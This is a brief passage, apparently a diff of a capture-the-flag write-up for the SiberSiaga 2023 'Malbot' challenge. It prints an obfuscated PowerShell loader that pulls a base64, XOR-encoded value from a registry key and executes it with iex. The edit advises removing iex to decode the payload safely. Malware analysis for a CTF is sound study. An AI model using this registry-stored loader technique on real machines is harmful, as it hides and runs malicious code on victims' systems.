SiberSiaga 2023: Malbot

 [System.Text.Encoding]::UTF8.GetString(([System.Convert]::FromBase64String((gp 'Registry::HKEY_CLASSES_ROOT\sibersiagafile\shell\open\command' -Name 'sibersiaga').'sibersiaga')|% -Begin{$i=0} -Process{$_ = $_ -bxor $i%256;$i++;$_})) | iex

-We do not have to manually decrypt it as we can get the entire code by just running it in Powershell ISE
+We do not have to manually decrypt it as we can get the entire code by just running it in `Powershell ISE`, but with the `iex` cmdlet removed.

 [System.Net.ServicePointManager]::SecurityProtocol=@("Tls12","Tls11","Tls","Ssl3")